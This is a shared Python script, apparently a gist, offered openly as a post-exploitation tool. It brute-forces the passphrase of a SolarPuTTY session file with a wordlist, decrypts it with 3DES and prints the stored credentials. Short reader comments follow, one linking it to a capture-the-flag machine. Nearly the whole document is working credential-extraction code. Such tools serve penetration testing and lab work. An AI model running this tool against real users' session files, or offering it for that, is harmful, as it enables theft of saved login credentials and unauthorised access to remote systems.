SolarPuTTYDecrypt: A post-exploitation tool to decrypt SolarPuTTY's session files, rewritten in Python. Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
import base64 | |
import sys | |
from Crypto.Cipher import DES3 | |
from Crypto.Protocol.KDF import PBKDF2 | |
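def decrypt(passphrase, ciphertext):
    """Decrypt one base64-encoded SolarPuTTY session blob with *passphrase*.

    Blob layout as consumed here (offsets into the base64-decoded bytes):
    ``[0:24]`` PBKDF2 salt, ``[24:32]`` 3DES-CBC IV, ``[48:]`` ciphertext.
    Bytes 32-48 are not used by this script. The 3DES key is
    ``PBKDF2(passphrase, salt, dkLen=24, count=1000)``; salt and IV travel
    inside the blob, so the passphrase is the only secret input.

    Args:
        passphrase: candidate passphrase (str).
        ciphertext: base64 text of the session file.

    Returns:
        The plaintext with PKCS#7 padding removed, rendered as a str of its
        ASCII characters only (non-ASCII bytes are dropped). Returns '' when
        the padding is not well-formed PKCS#7 -- the usual outcome of a wrong
        passphrase -- or when any step raises; the exception is printed, not
        propagated, so a wordlist loop keeps going.
    """
    data = ''
    try:
        blob = base64.b64decode(ciphertext)
        salt = blob[:24]
        iv = blob[24:32]
        encrypted_data = blob[48:]
        key = PBKDF2(passphrase, salt, dkLen=24, count=1000)
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        # Validate the padding instead of blindly slicing by the last byte:
        # a garbage last byte of 0 or >8 would otherwise silently truncate.
        plaintext = _strip_pkcs7(cipher.decrypt(encrypted_data), DES3.block_size)
        if plaintext is not None:
            data = ''.join(chr(c) for c in plaintext if chr(c).isascii())
    except Exception as e:
        print(f'Error: {e}')
    return data


def _strip_pkcs7(padded, block_size):
    """Return *padded* without its PKCS#7 padding, or None if the padding is malformed.

    Malformed means: empty input, a pad length outside 1..block_size, or pad
    bytes that do not all equal the pad length.
    """
    if not padded:
        return None
    pad_len = padded[-1]
    if not 1 <= pad_len <= block_size:
        return None
    if padded[-pad_len:] != bytes([pad_len]) * pad_len:
        return None
    return padded[:-pad_len]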
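def main():
    """Try each wordlist line as the passphrase for one session file.

    Usage: ``script putty_session.dat wordlist.txt``. Prints a progress line
    per candidate (overwritten in place with ``\\r``) and stops at the first
    decryption whose plaintext contains 'Credentials', printing that plaintext.
    Exits with status 1 when fewer than two arguments are given.
    """
    if len(sys.argv) < 3:
        print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt')
        # sys.exit rather than the bare exit(): the latter is only injected
        # by the site module and is absent under `python -S`.
        sys.exit(1)
    with open(sys.argv[1]) as f:
        cipher = f.read()
    # Pin UTF-8 and replace undecodable bytes so one odd wordlist line does
    # not abort the whole run with UnicodeDecodeError.
    with open(sys.argv[2], encoding='utf-8', errors='replace') as passwords:
        for i, password in enumerate(passwords):
            password = password.strip()
            decrypted = decrypt(password, cipher)
            print(f'[{i}] {password=}', end='\r')
            if 'Credentials' in decrypted:
                print(f'\r[{i}] {password=} {" " * 10}')
                print()
                print(decrypted)
                break


if __name__ == '__main__':
    main()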
Tested with:
➜ pip freeze | sls crypto
cryptography==41.0.5
pycryptodome==3.21.0
oh thank god, i was banging my head against the wall trying to use dotnet
Thank the lord
You are here for HTB Instant.
More info:
Original Author: Paolo Stagno (@Void_Sec - voidsec.com)